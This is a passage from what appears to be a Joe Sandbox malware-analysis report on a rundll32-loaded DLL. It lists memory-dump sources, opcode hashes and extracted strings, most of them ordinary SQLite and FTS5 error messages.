                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT segid, term, (pgno>>1), (pgno&1) FROM %Q.'%q_idx' WHERE segid=%d ORDER BY 1, 2$block$misuse
                                                                                                                                                                                                • API String ID: 0-1560523725
                                                                                                                                                                                                • Opcode ID: 64a35079d656a5389a38621181a9220c01dabf574437a917d26cb33714b277e9
                                                                                                                                                                                                • Instruction ID: cecdb189bb8dd683bbb992bab8b857ba7dd364e9f053b06bd71cec96967d8f61
                                                                                                                                                                                                • Opcode Fuzzy Hash: 64a35079d656a5389a38621181a9220c01dabf574437a917d26cb33714b277e9
                                                                                                                                                                                                • Instruction Fuzzy Hash: AD234921B0AA4386EB649F25D4A4BB937A1FB48B84F558036DA6E477F9CF7CE441C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s a subset of columns on fts5 contentless-delete table: %s$%s contentless fts5 table: %s$'delete' may not be used with a contentless_delete=1 table$cannot DELETE from contentless fts5 table: %s$cannot UPDATE$delete$fts5_locale() requires locale=1$version
                                                                                                                                                                                                • API String ID: 0-2196455284
                                                                                                                                                                                                • Opcode ID: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                                • Instruction ID: 339c6d6e95d6755ee98473cc2f2f30e0f794591199d7ce047606e205a8626053
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F1D36AB0A64396EB609A269070F7A2791FB48B84F007031DF6E476F9DF3CE451D340
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$BINARY$E$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                                                                                                                                • API String ID: 0-1048875598
                                                                                                                                                                                                • Opcode ID: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                                • Instruction ID: 7949d6bedc3e74a3c51672ea3ec51fddf9d17a897aa1a747a5fb00eff633cf5c
                                                                                                                                                                                                • Opcode Fuzzy Hash: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                                • Instruction Fuzzy Hash: 35D2DE62B0A68786EB608B26D160B7977E1FB49B84F049132DEAD477E9DF3CE450C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                • API String ID: 0-3346138532
                                                                                                                                                                                                • Opcode ID: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                                • Instruction ID: 4a93d48f4aea12fdd46174f716f86f52ba453ae49ff605567edff03baa386a37
                                                                                                                                                                                                • Opcode Fuzzy Hash: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                                • Instruction Fuzzy Hash: B482527270AA8386E7649F15E060ABE77A5FB44B84F145035DBAD0BBA9DF3DE441CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                • API String ID: 0-3346138532
                                                                                                                                                                                                • Opcode ID: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                                • Instruction ID: 51e1d6a50419d9b16f3f9405388cc94011ddb1e2e6f6a504f59fdfe0320e83af
                                                                                                                                                                                                • Opcode Fuzzy Hash: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4572527270AA8386E7649F15E060AAE77A5FB44B84F145035DBAD0BBA9DF3DE441CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$GROUP$HAVING clause on a non-aggregate query$ORDER$aggregate functions are not allowed in the GROUP BY clause$too many terms in ORDER BY clause
                                                                                                                                                                                                • API String ID: 0-2302332886
                                                                                                                                                                                                • Opcode ID: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                                • Instruction ID: 46e54506e4af035e398e11a60b84c3ea345529c7ae4ded82dde04261741e5c08
                                                                                                                                                                                                • Opcode Fuzzy Hash: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 62329C72B0AA438AEB14CF25C160AA937A5FF45B88F149035DE6D47BE9DF38E551CB00
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                • Opcode ID: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                                • Instruction ID: a4838a1308dd384f2010a52660ea429bc77595c5d2815cf71567e0eab6016eb8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                                • Instruction Fuzzy Hash: C4319336719B8286DB60CF24E850AAE33A4FB88758F540135EAAD43BA9DF7CD155CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$PRAGMA %Q.data_version$SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1$block$misuse
                                                                                                                                                                                                • API String ID: 0-61052504
                                                                                                                                                                                                • Opcode ID: 419069260ccd87fb7566e262ed9d35833cde6a15a896e7ff2324afa29850a64d
                                                                                                                                                                                                • Instruction ID: c470e24e4008006c90b8d524298f5de7166cce4b0c947acbcc110c666c5c3d2b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 419069260ccd87fb7566e262ed9d35833cde6a15a896e7ff2324afa29850a64d
                                                                                                                                                                                                • Instruction Fuzzy Hash: ACD27A32B0AA9386EB649B16E464BB977A4FB44B94F044035DAAD07BF8DF7CE441C740
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ?$?$BINARY$Expression tree is too large (maximum depth %d)$auto-index$automatic index on %s(%s)
                                                                                                                                                                                                • API String ID: 0-2778317500
                                                                                                                                                                                                • Opcode ID: 314a1b3bcdb44cc20aab5f965d8e05d1a2fec308b2e1a0e4f2dfd653daf145c8
                                                                                                                                                                                                • Instruction ID: cf2bc96f85a1520d57b54bf5d9af1caf69fda6204d7ff11e5c8be5b76b58f60b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 314a1b3bcdb44cc20aab5f965d8e05d1a2fec308b2e1a0e4f2dfd653daf145c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC28E7670AA82C6EB60CF15D0A0BAD7BA4FB88B88F118135DB9D437A9DF38D555C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                                • API String ID: 0-968123305
                                                                                                                                                                                                • Opcode ID: f265ee903916efa366c060d96c82a21d87256217d6df19eff7ed7f67b8c91827
                                                                                                                                                                                                • Instruction ID: 3ff5ee86aa3ea32fe551321825bcbfc97eb93181d7082b3c1b254bf2c8002505
                                                                                                                                                                                                • Opcode Fuzzy Hash: f265ee903916efa366c060d96c82a21d87256217d6df19eff7ed7f67b8c91827
                                                                                                                                                                                                • Instruction Fuzzy Hash: EDA28A22B0AA4385EB248F65D0A4BBD23A5FB44B88F150535DE6E577F8DF3CE9418360
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Expression tree is too large (maximum depth %d)$a NATURAL join may not have an ON or USING clause$ambiguous reference to %s in USING()$cannot join using column %s - column not present in both tables$coalesce$too many arguments on function %T
                                                                                                                                                                                                • API String ID: 0-1975222901
                                                                                                                                                                                                • Opcode ID: f8d3104c843aea2c84ab35d5d92242b9d661f0bf1266f43572f7bed1e0e14d57
                                                                                                                                                                                                • Instruction ID: 5d50d50acb564ce5ad0f33d43e7a120d79a8249283d202f401b8999ecde669b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d3104c843aea2c84ab35d5d92242b9d661f0bf1266f43572f7bed1e0e14d57
                                                                                                                                                                                                • Instruction Fuzzy Hash: C692A032B0A68286E750CB15D460B797BA0FB49BC4F099136DEAD47BE9EF78E441C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 20c:20e$40f$40f-20a-20d$50f$50f-20a-20d$second
                                                                                                                                                                                                • API String ID: 0-2094803905
                                                                                                                                                                                                • Opcode ID: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                                • Instruction ID: 4b4a892673521495c67346634d895fe8bf4f10bd4664b00732f245cb5c0c7cc6
                                                                                                                                                                                                • Opcode Fuzzy Hash: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4752BC62F2968346E725CF358430A7867A5AF55748F14C336D92E96BECEF3CE6418B00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
                                                                                                                                                                                                • API String ID: 0-3006123741
                                                                                                                                                                                                • Opcode ID: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                • Instruction ID: af56ba4e2fa4201e0d28016bb0dac5b0aadf6f82fd89bc673550da9bf2b1f2ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95123A62B0A9A781EB544B268470A7C3FA1FB45B85F544136DEBE473E9CE3CDA41C720
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                • API String ID: 0-463513059
                                                                                                                                                                                                • Opcode ID: a520bd6613b1a4b72b86e1f77885bdd4944c128e3b9cb83866224ac5a171b037
                                                                                                                                                                                                • Instruction ID: d8b85b806d87159487e2ff55cc1517fe5307aaa50d5a1fd188ad17889a3b7bd8
                                                                                                                                                                                                • Opcode Fuzzy Hash: a520bd6613b1a4b72b86e1f77885bdd4944c128e3b9cb83866224ac5a171b037
                                                                                                                                                                                                • Instruction Fuzzy Hash: ACF10161B0E78747EB0D8B3968619783BA0AB45780F184136DEBE477EADE6CB611C300
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                • API String ID: 0-3582982771
                                                                                                                                                                                                • Opcode ID: b28334610613b286db38a69b1498e04b9d371b2a693c3fef70d5cbf47dc4e95d
                                                                                                                                                                                                • Instruction ID: 3aafb73295cbaecc80471c0ae9821a64c3d4392e72dc13583ce8844428d5e2d2
